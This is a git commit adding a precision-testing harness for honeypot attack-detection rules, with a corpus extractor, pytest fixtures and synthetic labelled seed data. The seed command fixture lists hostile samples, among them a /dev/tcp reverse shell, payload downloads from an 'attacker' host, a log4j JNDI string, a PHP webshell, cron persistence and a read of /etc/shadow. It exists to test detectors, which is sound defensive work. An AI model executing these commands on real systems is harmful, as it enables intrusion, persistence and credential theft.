feat(ttp): E.3.8 corpus + harness — labelled holdout fixture
Sub-step preceding the rule-pack commits per TTP_TAGGING.md:2967. Adds the per-rule precision suite scaffolding under tests/ttp/rule_precision/: - conftest.py: precision_engine fixture (RuleEngine populated from ./rules/ttp/), corpus_loader (real → seed → empty fallback), precision_for() helper for TP/FP accounting. - _build_corpus.py: extractor for a real prod corpus pull. Mandatory --exclude-ip / DECNET_TTP_CORPUS_EXCLUDE_IPS — operator IPs never end up in the committed exclusion list. Pulls both 'command' and 'unknown_command' event types. - corpus/seed_*.jsonl: synthetic seed rows for each cohort so the harness exercises in clean checkouts. - corpus/*.jsonl (operator-built) is gitignored. - test_corpus_loads.py: sentinel that every seed file parses.
This commit is contained in:
6
.gitignore
vendored
6
.gitignore
vendored
@@ -57,3 +57,9 @@ deps.txt
|
|||||||
# build/deploy time.
|
# build/deploy time.
|
||||||
node_modules/
|
node_modules/
|
||||||
package-lock.json
|
package-lock.json
|
||||||
|
|
||||||
|
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
|
||||||
|
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
|
||||||
|
# files alongside ARE committed and exercise the harness in CI.
|
||||||
|
tests/ttp/rule_precision/corpus/*.jsonl
|
||||||
|
!tests/ttp/rule_precision/corpus/seed_*.jsonl
|
||||||
|
|||||||
12
tests/ttp/rule_precision/__init__.py
Normal file
12
tests/ttp/rule_precision/__init__.py
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
"""Per-rule precision suite for TTP rule pack v0.
|
||||||
|
|
||||||
|
One test module per rule cohort (command / behavioral / email / canary /
|
||||||
|
intel) drives the labelled holdout corpus through a real
|
||||||
|
:class:`RuleEngine` bound to ``./rules/ttp/`` and asserts the
|
||||||
|
Appendix-C precision target.
|
||||||
|
|
||||||
|
Live cohort: command (R0001-R0030). Other cohorts ship YAMLs whose
|
||||||
|
match specs target downstream lifters (E.3.9-E.3.12); their
|
||||||
|
precision tests are :func:`pytest.xfail`-gated until the lifter
|
||||||
|
lands, matching the CDD pattern from ``development/TTP_TAGGING.md``.
|
||||||
|
"""
|
||||||
121
tests/ttp/rule_precision/_build_corpus.py
Normal file
121
tests/ttp/rule_precision/_build_corpus.py
Normal file
@@ -0,0 +1,121 @@
|
|||||||
|
"""Extract a labelled corpus from the production sqlite DB.
|
||||||
|
|
||||||
|
Run on the operator workstation against a real ``decnet-prod.db``.
|
||||||
|
Outputs ``corpus/commands.jsonl`` (gitignored).
|
||||||
|
|
||||||
|
**IP exclusion is mandatory and operator-supplied.** The operator's
|
||||||
|
own source IP, plus any other addresses that must never end up in a
|
||||||
|
committed/inspected corpus, are passed via ``--exclude-ip`` (repeatable)
|
||||||
|
or the ``DECNET_TTP_CORPUS_EXCLUDE_IPS`` env var (comma-separated).
|
||||||
|
The script refuses to run with an empty exclusion list — extracting
|
||||||
|
attacker payloads without a vetted blocklist is a doxxing footgun and
|
||||||
|
that mistake is not allowed to happen silently.
|
||||||
|
|
||||||
|
Usage::
|
||||||
|
|
||||||
|
DECNET_TTP_CORPUS_EXCLUDE_IPS="<your-ip>,<other>" \\
|
||||||
|
python -m tests.ttp.rule_precision._build_corpus \\
|
||||||
|
--db /path/to/decnet-prod.db \\
|
||||||
|
--out tests/ttp/rule_precision/corpus
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import sqlite3
|
||||||
|
import sys
|
||||||
|
from collections.abc import Iterable
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
# Captures whatever follows a word-boundary ``cmd=`` up to the ``$`` anchor.
_CMD_RE = re.compile(r"\bcmd=(.*)$")
# Name of the environment variable holding the comma-separated IP exclusions.
_ENV_VAR = "DECNET_TTP_CORPUS_EXCLUDE_IPS"
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_cmd(raw_line: str) -> str | None:
    """Return the stripped text following ``cmd=`` in *raw_line*.

    Returns ``None`` both when the line carries no ``cmd=`` field and when
    the field is present but blank after stripping.
    """
    found = _CMD_RE.search(raw_line)
    if found is not None:
        text = found.group(1).strip()
        if text:
            return text
    return None
|
||||||
|
|
||||||
|
|
||||||
|
def _scrub_ips(text: str, excludes: Iterable[str]) -> str:
|
||||||
|
out = text
|
||||||
|
for ip in excludes:
|
||||||
|
out = out.replace(ip, "0.0.0.0")
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_excludes(cli: list[str]) -> list[str]:
    """Merge CLI and environment exclusions into one sorted, de-duplicated list.

    Both sources are normalised the same way: surrounding whitespace is
    stripped and blank entries are dropped. Without that, ``--exclude-ip ""``
    would yield ``[""]`` — a non-empty list that satisfies the "exclusion is
    mandatory" guard while excluding nothing.

    :param cli: values collected from repeated ``--exclude-ip`` flags.
    :returns: sorted unique exclusions from *cli* plus the comma-separated
        environment variable named by ``_ENV_VAR``; empty when neither
        source supplies a usable entry.
    """
    env = os.environ.get(_ENV_VAR, "")
    candidates = [*cli, *env.split(",")]
    cleaned = (entry.strip() for entry in candidates)
    return sorted({entry for entry in cleaned if entry})
|
||||||
|
|
||||||
|
|
||||||
|
def build_command_corpus(
    db_path: Path,
    out_path: Path,
    excludes: list[str],
) -> int:
    """Write ``commands.jsonl`` from the prod DB. Returns row count.

    Pulls ``raw_line`` for every ``command`` / ``unknown_command`` event
    whose ``attacker_ip`` is not in *excludes*, extracts the ``cmd=`` text,
    de-duplicates on that text, scrubs excluded IPs out of the payload and
    writes one JSON object per line.

    Rows are emitted with an empty ``expected_rule_ids`` list and a
    sequential ``prod-NNNN`` label: the output is *unlabelled* and must be
    hand-labelled before it can serve as precision ground truth.

    :param db_path: sqlite database to read.
    :param out_path: directory receiving ``commands.jsonl`` (created if
        missing).
    :param excludes: IPs dropped from the SQL pull and scrubbed from the
        command text. Must be non-empty.
    :returns: number of rows written.
    :raises RuntimeError: if *excludes* is empty.
    """
    if not excludes:
        raise RuntimeError(
            "refusing to extract corpus with empty IP exclusion list — "
            f"set --exclude-ip or {_ENV_VAR}",
        )
    placeholders = ",".join("?" * len(excludes))
    # NOTE: under SQL three-valued logic ``NULL NOT IN (...)`` is not true,
    # so rows with a NULL attacker_ip are dropped as well.
    sql = (
        "SELECT raw_line FROM logs "
        "WHERE event_type IN ('command', 'unknown_command') "
        f"AND attacker_ip NOT IN ({placeholders})"
    )
    rows: list[dict[str, Any]] = []
    seen: set[str] = set()
    # ``with sqlite3.connect(...)`` only scopes a transaction; it does not
    # close the connection, so close it explicitly.
    con = sqlite3.connect(db_path)
    try:
        for (raw,) in con.execute(sql, excludes):
            if raw is None:
                # A NULL raw_line carries no command to extract.
                continue
            cmd = _extract_cmd(raw)
            if cmd is None or cmd in seen:
                continue
            seen.add(cmd)
            scrubbed = _scrub_ips(cmd, excludes)
            rows.append({
                "source_kind": "command",
                "payload": {"command_text": scrubbed},
                "expected_rule_ids": [],
                "label": f"prod-{len(rows):04d}",
            })
    finally:
        con.close()
    out_path.mkdir(parents=True, exist_ok=True)
    target = out_path / "commands.jsonl"
    with target.open("w", encoding="utf-8") as fh:
        for row in rows:
            fh.write(json.dumps(row, ensure_ascii=False) + "\n")
    return len(rows)
|
||||||
|
|
||||||
|
|
||||||
|
def main(argv: list[str] | None = None) -> int:
    """Command-line entry point: parse flags, build the corpus, report.

    :param argv: argument vector; ``None`` lets argparse read ``sys.argv``.
    :returns: ``0`` once the corpus file has been written.
    """
    exclude_help = (
        "IP to drop from the SQL pull AND scrub from cmd payloads. "
        f"Repeatable. Merged with ${_ENV_VAR}. At least one "
        "exclusion is mandatory."
    )
    cli = argparse.ArgumentParser(description=__doc__)
    cli.add_argument("--db", type=Path, required=True)
    cli.add_argument("--out", type=Path, required=True)
    cli.add_argument(
        "--exclude-ip",
        action="append",
        default=[],
        help=exclude_help,
    )
    opts = cli.parse_args(argv)
    # Flags and the environment variable are merged before extraction.
    blocked = _resolve_excludes(opts.exclude_ip)
    written = build_command_corpus(opts.db, opts.out, blocked)
    print(f"wrote {written} command rows to {opts.out / 'commands.jsonl'}")
    return 0
|
||||||
|
|
||||||
|
|
||||||
|
# Script entry point: main()'s return value becomes the process exit code.
if __name__ == "__main__":  # pragma: no cover
    sys.exit(main())
|
||||||
220
tests/ttp/rule_precision/conftest.py
Normal file
220
tests/ttp/rule_precision/conftest.py
Normal file
@@ -0,0 +1,220 @@
|
|||||||
|
"""Fixtures for the per-rule precision suite.
|
||||||
|
|
||||||
|
Two halves:
|
||||||
|
|
||||||
|
* :func:`precision_engine` — async fixture that builds a real
|
||||||
|
:class:`RuleEngine` populated from ``./rules/ttp/`` via
|
||||||
|
:func:`_parse_and_compile`. We bypass ``RuleEngine.watch_store``
|
||||||
|
(which would loop forever on the inotify subscription) and instead
|
||||||
|
call ``_install`` directly per rule. The engine reads no rules
|
||||||
|
through any store ABC method, so a stub store passes for
|
||||||
|
construction.
|
||||||
|
* :func:`corpus_loader` — factory fixture returning labelled rows
|
||||||
|
for a cohort (``commands`` / ``email`` / ``intel`` / ``canary`` /
|
||||||
|
``behavioral``). Prefers ``corpus/<name>.jsonl`` (operator-built,
|
||||||
|
gitignored) and falls back to ``corpus/seed_<name>.jsonl``
|
||||||
|
(synthetic, committed). If neither exists the fixture returns ``[]``
|
||||||
|
and the precision tests :func:`pytest.skip` themselves — letting a
|
||||||
|
fresh checkout exercise the harness without a corpus.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import json
|
||||||
|
from collections.abc import Callable
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any, NamedTuple
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
import pytest_asyncio
|
||||||
|
|
||||||
|
from decnet.ttp.base import TaggerEvent
|
||||||
|
from decnet.ttp.impl.rule_engine import CompiledRule, RuleEngine
|
||||||
|
from decnet.ttp.store.base import RuleState
|
||||||
|
from decnet.ttp.store.impl.filesystem import _parse_and_compile
|
||||||
|
|
||||||
|
_RULES_DIR = Path(__file__).resolve().parents[2] / "rules" / "ttp"
|
||||||
|
_CORPUS_DIR = Path(__file__).resolve().parent / "corpus"
|
||||||
|
|
||||||
|
|
||||||
|
class CorpusRow(NamedTuple):
    """One labelled corpus row.

    ``payload`` carries the keys the engine's match operator reads —
    ``command_text`` for ``command``, ``raw_url`` for ``http_request``,
    etc. ``expected_rule_ids`` is the human-labelled ground truth: the
    rules a competent analyst would expect to fire on this row.
    Negative examples (an empty ``expected_rule_ids``) are load-bearing
    for precision: any rule that fires on such a row is counted as a
    false positive.
    """

    # Event kind the row is replayed as (e.g. ``command``, ``email``).
    source_kind: str
    # Field values handed to the engine for matching.
    payload: dict[str, Any]
    # Rule ids expected to fire; empty for negative examples.
    expected_rule_ids: tuple[str, ...]
    # Row identifier; ``precision_for`` looks up fired rules by this value.
    label: str
|
||||||
|
|
||||||
|
|
||||||
|
class _StubStore:
|
||||||
|
"""Just enough of :class:`RuleStore` to satisfy ``RuleEngine.__init__``.
|
||||||
|
|
||||||
|
The fixture installs rules directly into the engine's dispatch
|
||||||
|
index; no store method is actually called during precision tests.
|
||||||
|
"""
|
||||||
|
|
||||||
|
async def load_compiled(self) -> list[CompiledRule]:
|
||||||
|
return []
|
||||||
|
|
||||||
|
async def get_state(self, _rule_id: str) -> RuleState:
|
||||||
|
return RuleState()
|
||||||
|
|
||||||
|
async def set_state(self, *_a: Any, **_kw: Any) -> None:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def subscribe_changes(self) -> Any:
|
||||||
|
async def _gen() -> Any:
|
||||||
|
if False: # pragma: no cover
|
||||||
|
yield None
|
||||||
|
return _gen()
|
||||||
|
|
||||||
|
|
||||||
|
def _load_compiled_rules() -> list[CompiledRule]:
    """Compile every ``.yaml`` / ``.yml`` file found directly in ``_RULES_DIR``.

    Files are visited in sorted order and share one :class:`RuleState`.
    A file that fails to parse or compile is skipped on purpose: cohort
    tests assert the presence of their rule_id, so a broken YAML shows up
    as a missing-rule failure instead of an error raised from the fixture.
    Returns an empty list when the rules directory does not exist.
    """
    compiled: list[CompiledRule] = []
    if _RULES_DIR.exists():
        shared_state = RuleState()
        yaml_paths = (
            entry
            for entry in sorted(_RULES_DIR.iterdir())
            if entry.suffix in {".yaml", ".yml"}
        )
        for yaml_path in yaml_paths:
            try:
                rule = _parse_and_compile(yaml_path, shared_state)
            except Exception:  # noqa: BLE001 — broken YAML is its own failure surface
                continue
            compiled.append(rule)
    return compiled
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture(scope="session")
def compiled_rules() -> list[CompiledRule]:
    """Session-scoped rule list, so the rule YAMLs are compiled once per run."""
    return _load_compiled_rules()
|
||||||
|
|
||||||
|
|
||||||
|
@pytest_asyncio.fixture
async def precision_engine(compiled_rules: list[CompiledRule]) -> RuleEngine:
    """Provide a :class:`RuleEngine` with every compiled rule installed.

    ``watch_store()`` is deliberately not used (it loops forever on the
    inotify subscription); each rule goes through ``_install`` instead,
    which populates the ``_by_kind`` / ``_by_rule`` indexes that the
    engine's public ``evaluate()`` reads.
    """
    populated = RuleEngine(_StubStore())  # type: ignore[arg-type]
    for compiled in compiled_rules:
        populated._install(compiled)
    return populated
|
||||||
|
|
||||||
|
|
||||||
|
def _read_jsonl(path: Path) -> list[dict[str, Any]]:
|
||||||
|
rows: list[dict[str, Any]] = []
|
||||||
|
with path.open("r", encoding="utf-8") as handle:
|
||||||
|
for line in handle:
|
||||||
|
stripped = line.strip()
|
||||||
|
if not stripped or stripped.startswith("#"):
|
||||||
|
continue
|
||||||
|
rows.append(json.loads(stripped))
|
||||||
|
return rows
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_corpus_path(name: str) -> Path | None:
    """Locate the corpus file for cohort *name*.

    ``<name>.jsonl`` wins over ``seed_<name>.jsonl``; ``None`` is returned
    when neither exists under ``_CORPUS_DIR``.
    """
    for filename in (f"{name}.jsonl", f"seed_{name}.jsonl"):
        candidate = _CORPUS_DIR / filename
        if candidate.exists():
            return candidate
    return None
|
||||||
|
|
||||||
|
|
||||||
|
def _row_from_dict(raw: dict[str, Any]) -> CorpusRow:
    """Build a :class:`CorpusRow` from one decoded JSONL object.

    Missing keys fall back to ``"command"`` (source kind), ``{}``
    (payload), ``[]`` (expected rule ids) and ``""`` (label).
    """
    kind = raw.get("source_kind", "command")
    body = raw.get("payload", {})
    rule_ids = raw.get("expected_rule_ids", [])
    name = raw.get("label", "")
    # Positional arguments follow the CorpusRow field order.
    return CorpusRow(str(kind), dict(body), tuple(rule_ids), str(name))
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture(scope="session")
def corpus_loader() -> Callable[[str], list[CorpusRow]]:
    """Provide a loader mapping a cohort name to its labelled rows.

    The loader looks for ``corpus/<name>.jsonl`` (real, gitignored) first,
    then ``corpus/seed_<name>.jsonl`` (synthetic, committed); when neither
    is present it returns an empty list so callers can skip.
    """

    def _load(name: str) -> list[CorpusRow]:
        located = _resolve_corpus_path(name)
        if located is None:
            return []
        return list(map(_row_from_dict, _read_jsonl(located)))

    return _load
|
||||||
|
|
||||||
|
|
||||||
|
def make_event(row: CorpusRow, source_id: str = "src") -> TaggerEvent:
    """Turn a :class:`CorpusRow` into the :class:`TaggerEvent` the engine consumes."""
    # The attacker / identity / session / decky fields are all left as None.
    blank_context = dict.fromkeys(
        ("attacker_uuid", "identity_uuid", "session_id", "decky_id"),
    )
    return TaggerEvent(
        source_kind=row.source_kind,
        source_id=source_id,
        payload=row.payload,
        **blank_context,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def precision_for(
    rule_id: str,
    rows: list[CorpusRow],
    fired: dict[str, list[str]],
) -> tuple[float, int, int]:
    """Compute precision = TP / (TP + FP) for *rule_id*.

    ``fired`` maps a row label to the rule ids that matched that row. A
    row on which *rule_id* fired counts as a TP when the row's
    ``expected_rule_ids`` lists *rule_id*, and as a FP otherwise. Rows on
    which the rule did not fire do not contribute.

    Returns ``(precision, tp, fp)``. With no firing rows at all the
    precision is vacuously ``1.0`` — callers are expected to gate that
    case with their ``min_matches`` check before asserting.
    """
    # Rows on which the rule fired at all.
    hits = [row for row in rows if rule_id in fired.get(row.label, [])]
    if not hits:
        return 1.0, 0, 0
    tp = sum(1 for row in hits if rule_id in row.expected_rule_ids)
    fp = len(hits) - tp
    return tp / len(hits), tp, fp
|
||||||
|
|
||||||
|
|
||||||
|
# Public names of this conftest: the row type, the fixtures and the helpers.
__all__ = [
    "CorpusRow",
    "compiled_rules",
    "precision_engine",
    "corpus_loader",
    "make_event",
    "precision_for",
]
|
||||||
2
tests/ttp/rule_precision/corpus/seed_behavioral.jsonl
Normal file
2
tests/ttp/rule_precision/corpus/seed_behavioral.jsonl
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
{"source_kind": "session", "payload": {"beacon_interval_s": 60, "beacon_jitter_pct": 0.05}, "expected_rule_ids": ["R0031"], "label": "low_jitter_beacon"}
|
||||||
|
{"source_kind": "session", "payload": {"beacon_interval_s": 0, "beacon_jitter_pct": 0}, "expected_rule_ids": [], "label": "negative_no_beacon"}
|
||||||
2
tests/ttp/rule_precision/corpus/seed_canary.jsonl
Normal file
2
tests/ttp/rule_precision/corpus/seed_canary.jsonl
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
{"source_kind": "canary_fingerprint", "payload": {"ua_signature": "HeadlessChrome/119", "navigator_webdriver": true}, "expected_rule_ids": ["R0049"], "label": "webdriver_flag"}
|
||||||
|
{"source_kind": "canary_fingerprint", "payload": {"ua_signature": "Mozilla/5.0", "navigator_webdriver": false}, "expected_rule_ids": [], "label": "negative_browser"}
|
||||||
41
tests/ttp/rule_precision/corpus/seed_commands.jsonl
Normal file
41
tests/ttp/rule_precision/corpus/seed_commands.jsonl
Normal file
@@ -0,0 +1,41 @@
|
|||||||
|
{"source_kind": "command", "payload": {"command_text": "hydra -L users.txt -P pass.txt ssh://10.0.0.1"}, "expected_rule_ids": ["R0001"], "label": "hydra_ssh_brute"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "medusa -h 10.0.0.1 -u root -P passlist -M ssh"}, "expected_rule_ids": ["R0001"], "label": "medusa_ssh_brute"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ncrack -p 22 --user root -P rockyou.txt 10.0.0.1"}, "expected_rule_ids": ["R0001"], "label": "ncrack_ssh"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "sqlmap -u http://victim/x?id=1 --dbs"}, "expected_rule_ids": ["R0007"], "label": "sqlmap_invocation"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "curl -H 'X-Api-Version: ${jndi:ldap://x.evil/a}' http://target"}, "expected_rule_ids": ["R0008", "R0012"], "label": "log4j_jndi_curl"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "curl http://target/page?file=../../../../etc/passwd"}, "expected_rule_ids": ["R0009", "R0013", "R0012"], "label": "path_traversal_passwd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "/bin/sh -c 'id'"}, "expected_rule_ids": ["R0010", "R0011", "R0019"], "label": "sh_dash_c_id"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"}, "expected_rule_ids": ["R0010", "R0011"], "label": "bash_revshell_devtcp"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "python3 -c 'import os; os.system(\"id\")'"}, "expected_rule_ids": ["R0011"], "label": "python_oneliner"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "wget http://attacker/payload.sh -O /tmp/p.sh"}, "expected_rule_ids": ["R0012"], "label": "wget_http_payload"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "curl -O http://attacker/loader.bin"}, "expected_rule_ids": ["R0012"], "label": "curl_http_loader"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "cat /etc/passwd"}, "expected_rule_ids": ["R0013"], "label": "cat_etc_passwd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "less /etc/passwd"}, "expected_rule_ids": ["R0013"], "label": "less_etc_passwd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "cat /etc/shadow"}, "expected_rule_ids": ["R0014"], "label": "cat_etc_shadow"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "find / -perm -u=s -type f 2>/dev/null"}, "expected_rule_ids": ["R0015", "R0016"], "label": "find_suid"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "find / -perm -4000"}, "expected_rule_ids": ["R0015", "R0016"], "label": "find_perm_4000"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "find / -name '*.conf'"}, "expected_rule_ids": ["R0016"], "label": "find_recursive_no_suid"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "nmap -sS -p 1-65535 10.0.0.0/24"}, "expected_rule_ids": ["R0017"], "label": "nmap_scan"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "masscan 10.0.0.0/8 -p443"}, "expected_rule_ids": ["R0017"], "label": "masscan"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "uname -a"}, "expected_rule_ids": ["R0018"], "label": "uname_a"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "lsb_release -a"}, "expected_rule_ids": ["R0018"], "label": "lsb_release"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "id"}, "expected_rule_ids": ["R0019"], "label": "id_alone"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "whoami"}, "expected_rule_ids": ["R0019"], "label": "whoami"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ip addr"}, "expected_rule_ids": ["R0020"], "label": "ip_addr"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ifconfig -a"}, "expected_rule_ids": ["R0020"], "label": "ifconfig"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "netstat -an"}, "expected_rule_ids": ["R0021"], "label": "netstat_an"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ss -tnp"}, "expected_rule_ids": ["R0021"], "label": "ss_tnp"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ldapsearch -x -b dc=example,dc=com '(objectClass=user)'"}, "expected_rule_ids": ["R0022"], "label": "ldapsearch"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "smbclient -L //10.0.0.1"}, "expected_rule_ids": ["R0023"], "label": "smbclient_list"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "useradd -m -s /bin/bash backdoor"}, "expected_rule_ids": ["R0024"], "label": "useradd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "echo '* * * * * curl http://x/a' >> /var/spool/cron/root"}, "expected_rule_ids": ["R0025", "R0012"], "label": "cron_persist"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "redis-cli -h 10.0.0.5 config set dir /root/.ssh"}, "expected_rule_ids": ["R0026"], "label": "redis_ssh_dir"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/x.php"}, "expected_rule_ids": ["R0027"], "label": "webshell_php"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "history -c"}, "expected_rule_ids": ["R0028"], "label": "history_clear"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "unset HISTFILE"}, "expected_rule_ids": ["R0028"], "label": "unset_histfile"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "sudo -l"}, "expected_rule_ids": ["R0029"], "label": "sudo_l"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "sudo su -"}, "expected_rule_ids": ["R0029"], "label": "sudo_su"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ls /tmp"}, "expected_rule_ids": [], "label": "negative_ls_tmp"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "echo hello"}, "expected_rule_ids": [], "label": "negative_echo"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "cd /var/log"}, "expected_rule_ids": [], "label": "negative_cd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ps aux"}, "expected_rule_ids": [], "label": "negative_ps_aux"}
|
||||||
3
tests/ttp/rule_precision/corpus/seed_email.jsonl
Normal file
3
tests/ttp/rule_precision/corpus/seed_email.jsonl
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
{"source_kind": "email", "payload": {"subject": "Urgent wire transfer needed", "from": "ceo@victim.example", "return_path": "evil@bad.example", "rcpt_count": 1, "body": "Please send $50k to the attached account immediately."}, "expected_rule_ids": ["R0047"], "label": "bec_wire"}
|
||||||
|
{"source_kind": "email", "payload": {"subject": "Newsletter", "from": "marketing@legit.example", "rcpt_count": 1, "body": "Hello world."}, "expected_rule_ids": [], "label": "negative_newsletter"}
|
||||||
|
{"source_kind": "email", "payload": {"subject": "Win a prize", "from": "promo@evil.example", "rcpt_count": 250, "body": "Click here http://evil.example/win"}, "expected_rule_ids": ["R0042"], "label": "mass_phish"}
|
||||||
2
tests/ttp/rule_precision/corpus/seed_intel.jsonl
Normal file
2
tests/ttp/rule_precision/corpus/seed_intel.jsonl
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
{"source_kind": "intel", "payload": {"verdict": "malicious", "provider": "abuseipdb", "categories": [18, 22]}, "expected_rule_ids": ["R0054"], "label": "abuseipdb_brute"}
|
||||||
|
{"source_kind": "intel", "payload": {"verdict": "benign", "provider": "greynoise", "tags": []}, "expected_rule_ids": [], "label": "negative_benign"}
|
||||||
33
tests/ttp/rule_precision/test_corpus_loads.py
Normal file
33
tests/ttp/rule_precision/test_corpus_loads.py
Normal file
@@ -0,0 +1,33 @@
|
|||||||
|
"""Sentinel: every cohort's seed corpus parses and the harness lives.
|
||||||
|
|
||||||
|
Runs in clean checkouts (no operator-built corpus). Asserts the seed
|
||||||
|
JSONL files load through :func:`corpus_loader` without raising and
|
||||||
|
yield non-empty lists. Doesn't run any rules — that's the per-cohort
|
||||||
|
suites' job. This sentinel exists so a busted corpus file fails the
|
||||||
|
suite immediately, not three commits later when the first cohort
|
||||||
|
test finally tries to load it.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from collections.abc import Callable
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from tests.ttp.rule_precision.conftest import CorpusRow
|
||||||
|
|
||||||
|
# Signature of the ``corpus_loader`` fixture's value: cohort name in, rows out.
CohortLoader = Callable[[str], list[CorpusRow]]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize(
    "name",
    ["commands", "email", "intel", "canary", "behavioral"],
)
def test_seed_corpus_loads(corpus_loader: CohortLoader, name: str) -> None:
    """Each cohort's corpus loads, is non-empty and has well-typed rows."""
    loaded = corpus_loader(name)
    assert loaded, f"seed_{name}.jsonl returned no rows"
    for entry in loaded:
        assert entry.source_kind, f"row {entry.label} missing source_kind"
        assert isinstance(entry.payload, dict)
        assert isinstance(entry.expected_rule_ids, tuple)
|
||||||
Reference in New Issue
Block a user